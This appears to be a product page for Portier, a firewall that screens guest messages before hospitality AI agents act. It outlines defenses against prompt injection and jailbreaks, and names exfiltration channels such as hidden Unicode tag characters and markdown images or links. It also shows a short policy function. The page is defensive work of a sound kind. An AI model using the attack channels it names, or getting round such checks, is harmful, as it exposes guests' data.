AI-SecOps · Hospitality

Portier

A doorkeeper for your AI agents.

Your concierge and guest-service agents read untrusted guest text — booking notes, chats. Portier inspects every message before the agent acts and returns a deterministic ALLOW · REDACT · BLOCK decision in code, mapped to OWASP LLM Top 10 (2025), the OWASP Agentic Top 10, and NIST AI RMF.

DETERMINISTIC — a hard guarantee (code decides) PROBABILISTIC — a signal, never the decision

Live inspection

Pick a scenario — or paste your own note and try to get something past the firewall. The six-layer trace streams in live; deterministic code makes the call.

portier · /inspectstream: SSE

deterministic replay — safe to try anything

Press Inspect to watch the trace stream in.

▢ awaiting decision…

Try it yourself

Press Try ▸ on any example to load it into the box above and watch the six-layer trace stream, or Copy it and edit your own. It all runs in safe DEMO mode — paste anything you like. Each card shows the expected verdict and why the deterministic boundary reaches it.

The inspection pipeline

Probabilistic layers produce evidence first; deterministic code makes and enforces the decision. If a probabilistic layer is wrong, the verdict does not change — the boundary is code.

■ deterministic = hard guarantee○ probabilistic = signal only▦ policy engine = the boundary

The agent registry

Least privilege is real, not cosmetic: each specialist sees only its slice of tools, and none of them can act — they read and classify. The decision is made by code that has no model at all.

Agent	Model role	Scoped tools (least privilege)
Inspector	supervisor — delegates & assembles a typed verdict; never decides	delegate-only · no data tools
InjectionAnalyst	prompt-injection / jailbreak intent	vector_signaturesread-only
DataClassifier	sensitive-access & state-change intent	classification_ctxread-only
FrameworkMapper	OWASP / NIST mapping	knowledge_baseread-only
PolicyEngine	the security boundary — pure code	no LLM · no tools

The defense, layer by layer

Six ordered layers, each tagged by what it can promise. Built from the 2025–2026 state of the art — every layer cited to its primary source.

A Probabilistic signals

✓ Spotlightingprob

Untrusted content is wrapped & datamarked so the agent treats it as opaque data — not instructions. Microsoft.

✓ Embedding signalprob

sqlite-vec KNN against known injection signatures. A vote, never a verdict — shown as audit evidence. OWASP LLM08.

✓ Quarantined inspectorprob

Scoped PydanticAI specialists read & classify only — the dual-LLM / CaMeL pattern. DeepMind.

B Deterministic guarantees

✓ PII / PCI scandet

Microsoft Presidio detects guest PII and card data; redaction is applied in code. OWASP LLM02.

✓ Policy enginedet

Meta's Rule of Two + egress allowlist → the ALLOW/REDACT/BLOCK decision. Pure function, exhaustively tested. OWASP LLM06.

✓ Output restrictionsdet

Strip hidden Unicode tag chars; defang markdown images/links — closes exfiltration channels without the model. SOTA.

Deployed on Cloudflare

A Worker at the edge fronts a Python container — no servers to manage, scales to zero. The LLM & graph backends are optional (LIVE mode); DEMO runs with neither.

Edge · Worker

Gateway

Serves this console, relays SSE, sets security headers, and rate-limits /inspect. Holds no security logic.

HTTPS ▸

Container · FastAPI

Inspection engine

The six-layer pipeline + the deterministic policy boundary. PydanticAI · Azure/Claudesqlite-vecPresidioNeo4jrate-limitaudit log

── solid = request path┄┄ dashed = optional (LIVE only)backend: DEMO ⇄ LIVE via PORTIER_MODE

The safety boundary is code, not a prompt

2025–2026 consensus: prompt injection can't be solved at the model layer. So the decision is made by a pure function — even a fully jailbroken specialist cannot change the verdict.

decide() · the only place a Decision is created

ALLOW — clean pass REDACT — PII/PCI present BLOCK — rule-of-two / egress / critical

# the security boundary — pure Python, no LLM, exhaustively tested
def decide(signals) -> Decision:
    rule_of_two = (signals.untrusted_input
                 + signals.sensitive_access
                 + signals.state_change) >= 3
    egress_bad  = any(t not in ALLOWLIST for t in signals.egress_targets)
    if rule_of_two or egress_bad or signals.has_critical:
        return Decision(BLOCK, ...)   # code decides — never the model
    if signals.pii_entities:
        return Decision(REDACT, ...)
    return Decision(ALLOW, ...)

Everything used to build it

A current stack — PydanticAI agents, the edge platform, and a verified security posture, every choice deliberate.

How it was built

From a job spec to a deployed, hardened system — research-first, spec-driven, verified in the real app.

Built on the spec

Every layer maps to a primary source — published security frameworks, peer-reviewed injection-defense research, and official platform docs. This is what Portier is built on, and the best practices it follows.

OWASP LLM Top 10 — 2025Every detection maps to LLM01/02/06/08; the verdict cites them live. OWASP Agentic AI — Threats & MitigationsGoal manipulation, tool misuse & identity/privilege abuse (Securing Agentic Applications Guide 1.0). NIST AI RMF 1.0 + GenAI Profile (AI 600-1)Decisions reference Govern/Map/Measure/Manage functions & provenance actions. MITRE ATLAS — AML.T0051"LLM Prompt Injection" technique; injection detections map to it. CaMeL — dual-LLM (DeepMind)Quarantined specialists read & classify; they never act. Spotlighting (Microsoft)Untrusted content is datamarked as opaque, non-instruction data.

Meta — "Rule of Two"≤2 of {untrusted input, sensitive access, state change} — the block rule.

"Attacker Moves Second" (2025)Why the boundary is code: model-layer defenses are bypassable.

WHATWG Server-Sent EventsThe wire format the live trace streams over. PydanticAISupervisor→specialist agent delegation, typed outputs, UsageLimits. Cloudflare Workers + ContainersWorker edge gateway fronting the Python inspection engine. Microsoft PresidioDeterministic PII/PCI detection & redaction. Neo4j CypherParameterized variable-length blast-radius reachability.